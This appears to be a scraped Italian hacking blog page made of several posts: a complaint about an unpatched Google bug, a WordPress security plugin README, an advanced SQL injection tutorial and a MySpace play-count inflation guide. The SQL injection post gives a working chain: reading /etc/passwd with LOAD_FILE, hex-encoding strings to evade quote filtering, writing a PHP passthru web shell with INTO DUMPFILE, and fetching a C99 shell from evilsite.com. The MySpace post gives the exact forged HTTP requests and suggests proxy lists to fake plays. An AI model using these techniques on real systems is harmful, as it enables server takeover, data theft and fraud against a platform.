Ebbene, è passato più di un anno, Google sicuramente avrà subito tantissimi cambiamenti sia a livello grafico che a livello di funzionalità, eppure questo problema non è ancora stato patchato.

Qui di seguito trovate il mio video, chiedo scusa per la bassa qualità ma quello originale è stato danneggiato tra un backup e l’altro, così il meglio che ho potuto fare è stato scaricarne la versione mp4 da youtube, dove un ragazzo che non conosco ha postato lo stesso video in bassa definizione.

Poi, qualche tempo fa, mi sono imbattuto in un altro video, postato su Vimeo da Emanuele Gentili, il quale mostra sostanzialmente la stessa vulnerabilità.

Il buon emgent, noto per la sua politica di responsible disclousure, ha immediatamente scritto al team tecnico di Google … e cosa gli hanno risposto ?

Si, è vero, è un bug, ma non sappiamo come patchare.. hai qualche suggerimento?

Perfetto, non solo in più di un anno non è cambiato nulla, non solo questa vulnerabilità potrebbe essere sfruttata in scenari praticamente infiniti, ma lo staff di Google si permette anche di rispondere così!

Che dire … bah! -.-

Related posts:

1. Google Hacking
2. Google : 0, Io : 1
3. Hybris memory lookup, now Google powered!!!

Sabato scorso son passato all’hack meeting, invitato da un (nuovo) amico, e mi sono imbattuto in uno speech proprio su questa tecnica di intrusione (che devo dire è anche la mia preferita per quanto concerne il web hacking ) ed il ragazzo che lo stava tenendo ha detto alla fine la frase “con le sql injections si possono fare innumerevoli cose” che mi ha fatto venir voglia di scrivere questo articolo.

Ci sono alcuni aspetti delle SQL injections che in realtà non sono molto conosciuti, ma che aprono davvero un mondo e portano un ipotetico attaccante (o un informatico che deve porre rimedio a questa piaga) nella condizione di avere accessi con privilegi ben superiori a quelli che una “normale” iniezione darebbe.

Accesso in lettura al file system.

MySQL, così come tantissimi altri database, hanno delle funzioni integrate nel linguaggio stesso che offrono funzionalità avanzate all’interno delle query, basti pensare alle funzioni CONCAT() o MID() per operare sulle stringhe.

Una funzione non molto conosciuta, principalmente perchè son pochi gli scenari nella quale convenga usarla, è la funzione LOAD_FILE() che, come suggerisce il nome stesso, serve per caricare il contenuto di un file all’interno di un buffer di MySQL.

Ad esempio, eseguendo la query :

SELECT LOAD_FILE(‘/etc/passwd’)

Riceveremo come risultato il contenuto del rinomato file … beh, perchè non utilizzare tale funzione anche all’interno di un injection ?

Invece di un ipotetico :

http://www.site.com/news.php?id=1 AND 1=2 UNION SELECT NULL,NULL,username,password FROM users/**

Potremmo fregarcene della tabella utenti ed andarci direttamente a spulciare il filesystem :

http://www.site.com/news.php?id=1 AND 1=2 UNION SELECT NULL,NULL,LOAD_FILE(‘/etc/passwd’),NULL/**

Come aggirare la rogna degli apici.

Seguendo l’esempio qui sopra riportato, vorrei parlare di un altro “trick” di MySQL non motlo conosciuto … spesso durante il testing di una sql injection, ci rendiamo conto che utilizzare degli apici all’interno del codice da noi iniettato diventa una vera rogna, questo specialmente quando la query che esegue la pagina web (e che noi non conosciamo del tutto) è molto complessa, con diverse JOIN ecc, risultando di volta in volta in un errore di sintassi perchè abbiamo messo un apice di troppo (che magari ci è stato segato dalle magic quotes, le puttane!!!).

Questo potrebbe accadere ad esempio, con gli apici utilizzati per passare l’argomento alla funzione LOAD_FILE … ma in realtà, aggirare questo problema (e metterlo nel cxxo alle gpc!) è abbastanza semplice se si conosce il modo … basta codificare in esadecimale!

Ovvero, invece di utilizzare la dicitura

SELECT LOAD_FILE(‘/etc/passwd’)

Utilizzeremo

SELECT LOAD_FILE( 0x2f6574632f706173737764 )

Dove 0x2f6574632f706173737764 corrisponde alla stringa /etc/passwd codificata in esadecimale … e così, via gli apici!

Questo si può utilizzare anche nei confronti (0x61646d696e = admin) :

SELECT NULL,NULL,username,password WHERE username=0x61646d696e

E così via, generalmente ogni qual volta bisognerebbe utilizzare una stringa ma per un motivo o per un altro non possiamo (o vogliamo perchè siam pigri) farlo.

Accesso in scrittura al file system.

Mi son tenuto questa chicca per ultima perchè è la più sfiziosa

Non sarebbe bello poter arrivare, partendo da una semplice sql injection, ad una shell php (o di qual si voglia linguaggio) pronta a runnare sul server in questione, così da poterci spulciare tutto il file system in pace ed eseguire comandi da remoto?

Beh, è fattibilissimo!

Analogamenente alla funzione LOAD_FILE precedentemente vista, esiste anche una coppia di keywords MySQL che invece ci permette di inserire del contenuto arbitrario all’interno del file che vogliamo, tale magica accoppiata è INTO DUMPFILE .

C’è da specificare una cosa che, anche essendo ovvia, non è così banale … dovendo specificare come argomento il path completo del file che vogliamo creare (o sovrascrivere!!), è sottointeso che tale cartella debba essere scrivibile dall’utente con i quali privilegi è in esecuzione il demone MySQL.

Se ci interessasse solamente creare un file non necessariamente raggiungibile via web (quindi non nella cartella nella quale apache si aspetta i file html e php), potremmo benissimo scrivere nella /tmp/ che generalmente è accessibile da tutti, utilizzando la query :

SELECT ‘contenuto’ INTO DUMPFILE ‘/tmp/blablabla’

O meglio ancora, codificato in esadecimale come abbiamo visto prima :

SELECT 0x636f6e74656e75746f INTO DUMPFILE 0x2f746d702f626c61626c61626c61

Dove “contenuto” ovviamente è quello che vogliamo mettere dentro il file …

Scrivere nella /tmp non è molto utile, a meno che il sito sia affetto anche da una LFI (local file inclusion = inclusione di file locali) e quindi potremmo prima creare il file e successivamente forzare una pagina ad includerlo per eseguirlo.

Quello che ci interessa veramente però (almeno quello che solitamente interessa a me ) è scrivere nella stessa cartella che contiene il sito, così da poterci mettere una shell ed utilizzarla in tutta comodità.

Non esiste (o almeno io non l’ho trovato) il modo, tramite una query SQL, di trovare il full path della htdocs, però ci sono un paio di metodi che, con un po di intuito e fortuna funzionano il 99% delle volte.

Il primo, tramite il metodo sopra indicato di lettura del file system,  consiste nel leggere il file di configurazione di apache (httpd.conf) che solitamente è contenuto in /etc/[qualcosa] (dove [qualcosa] è cmq un valore che varia di poco da server a server ed è di conseguenza facilmente ‘guessabile’) e vedere i path dei vari virtual hosts .

Questo metodo però, necessita che l’utente con il quale runna MySQL possa leggere quel file e non sempre questo è possibile anzi, se chi ha configurato il server è bravo, non è quasi mai possibile.

Il secondo metodo invece, funziona praticamente sempre

Ormai, la stragrande maggioranza dei siti utilizza applicazioni web cms quali WordPress, PHPNuke (OMFG c’è ancora chi lo usa!!!), PHPFusion, Joomla e così via.

Tali sistemi, al momento dell’installazione, inseriscono in una tabella (che varia da sistema a sistema, ma essendo questi sistemi opensource cmq le tabelle sono note) il full path nel quale sono stati installati, il più delle volte per poter includere correttamente i vari file php che gli servono, altre volte (specialmente nel caso dei forum) per sapere in quale cartella, ad esempio, possono spostare gli allegati uploadati in un post.

Ebbene … è proprio quello che ci serve!

Abbiamo una sql injection, sappiamo quale sistema PHP gira nel sito, sappiamo quale colonna di quale tabella ci interessa … ci basterà utilizzare una sql injection che selezioni quella variabile dal database e eccoci qui, abbiamo il full path di installazione del sito che stiamo attaccando!

A questo punto, ipotizzando che il path sia “/var/www/htdocs/sito.com/” (ipotesi tra l’altro non molto distante dalle casistiche reali), potremmo utilizzare una sql injection del tipo :

http://www.site.com/news.php?id=1 AND 1=2 UNION SELECT NULL,NULL,’<?php passthru($_GET["cmd"]); ?>‘,NULL INTO DUMPFILE ‘/var/www/htdocs/sito.com/lulz.php’/**

(Magari il tutto opportunamente codificato in hex come visto prima, fate vobis che a me non va XD)

Dalla query risulta evidente come abbiamo scritto un piccolo codice php all’interno della pagina lulz.php, codice che eseguirà qualsiasi comando gli venga passato tramite la variabile “cmd”, mostrandone il contenuto … a questo punto, o utiliziamo lo script direttamente, del tipo :

http://www.site.com/lulz.php?cmd=ls

Oppure, cosa ancor più comoda, potremmo utilizzarlo per scaricare, tramite wget, una shell un attimino più decente (magari una C99) :

http://www.site.com/lulz.php?cmd=wget%20http://www.evilsite.com/c99.txt

http://www.site.com/lulz.php?cmd=mv%20c99.txt%20c99.php

Ed eccoci qua, da una semplice e comune SQL injection, siamo passati ad avere una shell sul server! Non male vero? Soprattutto se pensate che tramite queste funzioni è possibile accedere, tramite i privilegi del demone MySQL, anche ad eventuali risorse di rete … a voi la ricerca!

Ci tengo a precisare che non sto scrivendo un articolo di questo genere, dopo tanto tempo che non ne scrivevo, per incitare le persone a lamerare, ma solo per sensibilizzare quei programmatori che troppo spesso, soprattutto in ambito professionale, sottovalutano dei bug apparentemente piccoli ma che, come mostrato, possono portare a conseguenze veramente disastrose.

Cya the next time!

Related posts:

1. Introduction to SQL Injections
2. iScan
3. Usare la serializzazione in PHP per il caching delle query SQL

Potete trovare il codice e le istruzioni per l’installazione la configurazione a questa pagina … proprio perchè mi sono sbattuto per scrivere il file README, NON risponderò ad alcuna domanda riguardante installazione e configurazione ma solo ad eventuali domande tecniche o che comunque reputerò intelliggenti .

Riporto brevemente la versione italiana del readme :

WP-Sentinel, erede in parte del progetto evilsentinel (R.I.P.), è un plugin per la piattaforma WordPress che aumenterà la sicurezza del vostro
blog da eventuali attacchi di cracker, lamer, black hats, h4x0r, ecc .
Il sistema verrà caricato prima degli altri plugins ed eseguirà una serie di controlli sulle richieste http in arrivo ed, in caso una o più richieste
facciano scattare un *allarme*, la bloccherà mostrando un avviso all’utente e notificherà per email l’accaduto all’amministratore del sito in questione,
con tutti i dettagli del potenziale attacco .

Questo plugin è in grado di bloccare i seguenti tipi di attacchi :

- Cross Site Scriptings <http://it.wikipedia.org/wiki/Cross-site_scripting>
- Remote File Inclusions <http://it.wikipedia.org/wiki/Remote_File_Inclusion>
- Local File Inclusions <https://www.ihteam.net/blog/hacking-tutorial/local-file-inclusion-tutorial/>
- SQL Injections <http://it.wikipedia.org/wiki/SQL_injection>
- Cross Site Request Forgery <http://it.wikipedia.org/wiki/Cross-site_request_forgery>
Il plugin *NON* effettua controlli nel caso in cui l’utente che effettua la richiesta è un amministratore del blog, quindi per testare il sistema dovrete

effettuare il logout .
Per INSTALLARE wp-sentinel, uploadate tutta la cartella ‘wp-sentinel‘ all’interno della cartella dei plugins ‘/wp-content/plugins/‘ del vostro blog e accertatevi
che la cartella ‘/wp-content/plugins/wp-sentinel/log’ sia scrivibile .
Successivamente il sistema potrà essere abilitato come ogni altro plugin ed entrerà immediatamente in funzione .

WP-Sentinel non ha molte configurazioni disponibili al momento, ma quelle poche che ci sono possono essere modificate tramite il file ‘/wp-content/plugins/wp-sentinel/php/config.php‘ .
I tre valori di configurazione sono :

- enabled : Impostato ad 1 abilita wp-sentinel, a 0 lo disabilita .
- notification : Abilita o meno le notifiche via email all’admin del blog .
- logging : Abilita o meno il logging degli allarmi dentro la cartella ‘wp-sentinel/log’ .

Enjoy

Related posts:

1. WP-Sentinel
2. Nuova funzione load, come realizzare in poche righe un sistema di plugin
3. Informazione di Servizio, now PDF powered :)

Come alcuni di voi sapranno, su questo social network è possibile creare un profilo per la propria band, nel quale poter uploadare i propri brani (o alcuni di essi) in formato mp3 che verranno poi eseguiti nel profilo stesso dall’apposito player in flash .

Ciò che non tutti sanno, o perlomeno che non tutti hanno notato, è che questo player tiene traccia delle statistiche di ogni brano, principalmente quanta gente lo ha ascoltato complessivamente, giornalmente, ecc ecc. Tali statistiche vengono poi utilizzate per scegliere le band da promuovere nella sezione musicale di myspace, in parole povere, le band più ascoltate usufruiranno di una pubblicizzazione gratuita (e decisamente remunerativa) nella sezione di MySpace .

Il mio compito era di reversare il protocollo di comunicazione di MySpace tra i vari server e sfruttare tali informazioni per scrivere un programma che incrementi arbitrariamente le statistiche di un brano o di tutta la playlist .

Per un motivo o per un altro il mio rapporto professionale con questa persona è andato a farsi benedire e mi son trovato in mano una settimana di ricerche e coding, che a questo punto decido di condividere con chiunque sia interessato, soprattutto perchè software analoghi sono sempre proprietari e a pagamento .

Come è facile immaginare, tutto ha inizio con una richiesta http al profilo dell’artista, nella forma :

http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid={ID DEL PROFILO}

Dove ovviamente l’ultimo parametro è un id numerico che identifica il profilo, ad esempio, un profilo che avevo creato per i test :

http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=454317278

Richiedendo ai server myspace questa pagina, ovviamente verrà scaricato l’html e il blocco del player flash, con dei parametri (le flashvars) molto importanti che ci serviranno in seguito, questi parametri si presentano nella forma :

...
plid=92912 <--- id della playlist
profid=454317278 <--- id del profilo
...
artid=19268119 <--- id dell'artista 
...

Tramite questi parametri, iniziamo ad addentrarci nel protocollo vero e proprio che sfrutta il player di myspace per ottenere le informazioni rigurdanti la playlist … reversando tale sfw, ho verificato che le informazioni sulla playlist vengono richieste in formato xml e possono essere ottenute tramite la seguente richiesta :

http://musicservices.myspace.com/Modules/MusicServices/Services/MusicPlayerService.ashx?artistUserId={ID PROFILO}&playlistId={ID PLAYLIST}&action=getArtistPlaylist&artistId={ID ARTISTA}

Quindi nel nostro profilo di esempio, l’url risulterà essere :

http://musicservices.myspace.com/Modules/MusicServices/Services/MusicPlayerService.ashx?artistUserId=454317278&playlistId=92912&action=getArtistPlaylist&artistId=19268119

E con questo otteniamo un xml con le informazioni della playlist, traccia per traccia, compresi gli id di ogni canzone, le statistiche, eventuali immagini cover, etc etc etc … in particolare ci interessa l’attributo songId del nodo xml song della canzone che ci interessa, nel caso del mio profilo di esempio, l’xml relativo all’unica canzone che ho caricato risulta essere :

...
<song songId="40916167" ...
...

A questo punto, dobbiamo iniziare la procedura http che genererebbe un normale utente aprendo il profilo, caricando il player flash, richiedendo l’ascolto di una traccia e di conseguenza incrementando il valore di ascolto della stessa .

La gestione del tutto è delegata al player swf e una volta reversato ho notato che la logica di ogni richiesta effettuata dal player stesso è la seguente :

• Richiedo un nuovo “token” (un id alfanumerico che identifica ogni richiesta) di autorizzazione al server musicservices.myspace.com .
• Richiedo al server profile.myspace.com di iniziare lo stream della traccia e successivamente di incrementarne le statistiche .

Ovviamente le due richieste vengono eseguite in http tramite una serie di campi nell’header specifici, impostati dal player, che identificano in modo univoco il player rendendo “sicura” e “non riproducibile” (almeno secondo loro XD) tutta la transazione .

Analiziamo ora la prima richiesta, ovvero l’impostazione del nuovo token di autorizzazione verso l’host musicservices.myspace.com :

POST /Modules/MusicServices/Services/MusicPlayerService.ashx?action=getToken HTTP/1.0
Host: musicservices.myspace.com
Accept:  application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
User-Agent: {USER AGENT DELL'UTENTE CHE VISITA IL PROFILO}
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: http://lads.myspace.com/videos/Main.swf
Content-type: application/x-www-form-urlencoded
x-myspace-id: ownerId={ID PROFILO};contentId={ID TRACCIA}
x-myspace-type: Music
x-myspace-action: Stream
Content-length: 16
service=tokennew

Quindi, una richiesta di esempio con Firefox e alla traccia del profilo che ho appositamente creato, risulterebbe :

POST /Modules/MusicServices/Services/MusicPlayerService.ashx?action=getToken HTTP/1.0
Host: musicservices.myspace.com
Accept:  application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: http://lads.myspace.com/videos/Main.swf
Content-type: application/x-www-form-urlencoded
x-myspace-id: ownerId=454317278;contentId=40916167
x-myspace-type: Music
x-myspace-action: Stream
Content-length: 16
service=tokennew

Il server a questo punto ci risponde con un xml del tipo :

<?xml version="1.0" encoding="utf-8"?><token>N1jfEyw1SLA2E2s6qcFAxaqIdbqU5dC/47iDlNUVpPoZXXzWqgzrX8bxMZAS2Np/UGKFeb+bO8EEANKT6fSIatp9ueAK9oKrDpP90lCHlAI=</token>

Dove la parte in grassetto identifica il famoso token .

Una piccola nota: Ai fini del nostro obiettivo, cioè incrementare le statistiche di una canzone, NON è importante ritrasmettere questo token nella richiesta successiva, ma è OBBLIGATORIO richiederlo per ogni streaming simulato, poichè da quel punto in poi il server contrassegnerà il nostro indirizzo ip come “autorizzato” ad ascoltare la canzone, per poi cancellare tale autorizzazione alla richiesta successiva .

Detto questo, possiamo procedere con la seconda richiesta, ovvero l’inizializzazione dello streaming vero e proprio, che aumenterà le statistiche della canzone richiesta :

GET /index.cfm?fuseaction=user.viewprofile&friendID={ID PROFILO} HTTP/1.0
Accept:  application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
User-Agent: {USER AGENT DELL'UTENTE CHE VISITA IL PROFILO}
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: http://lads.myspace.com/videos/Main.swf
Host: profile.myspace.com
x-myspace-id: ownerId={ID ARTISTA};contentId={ID TRACCIA}
x-myspace-type: Music
x-myspace-action: Stream

Quindi nel nostro caso la richiesta appare come :

GET /index.cfm?fuseaction=user.viewprofile&friendID=454317278 HTTP/1.0
Accept:  application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: http://lads.myspace.com/videos/Main.swf
Host: profile.myspace.com
x-myspace-id: ownerId=19268119;contentId=40916167
x-myspace-type: Music
x-myspace-action: Stream

Ed in seguito a questa richiesta il server incrementerà le statistiche della canzone ^^ .

Ovviamente, per chi volesse realizzare un applicazione che incrementasse le stats in modo consistente, dovrebbe instaurare parecchie richieste in parallelo (threads rule ), possibilmente utilizzando una lista di proxy http abbastanza corposa da utilizzare singolarmente per ogni richiesta http .

Related posts:

1. Google Hacking
2. Realtime Source Auditing
3. Syn Scanning

Scarica

Related posts:

1. Script per il calcolo della chiave WPA dei router Alice Gate VoIP 2 Plus Wi-Fi
2. Script per il calcolo della chiave WPA dei router FastWeb Pirelli.

Scarica

Related posts:

1. iScan
2. Tecniche avanzate di SQL Injection, quello che non tutti sanno!
3. PHP Hacking & Prevention

Scarica

Related posts:

1. Introduction to SQL Injections
2. Javascript Encoder
3. iScan

Scarica

Related posts:

1. Come hackerare Google e rimanere indisturbato per un anno.
2. MySpace Protocol Reversing – Band Auto Clicker
3. Javascript Encoder

Il database dei pattern di ricerca delle vulnerabilità consiste in un file xml che può essere facilmente modificato, ampliato e/o eventualmente adattato alle proprie necessità .

Scarica

Related posts:

1. Javascript Encoder
2. Introduction to SQL Injections
3. Shellcode Generator

Scarica

Related posts:

1. iScan
2. PHP Hacking & Prevention
3. Introduction to SQL Injections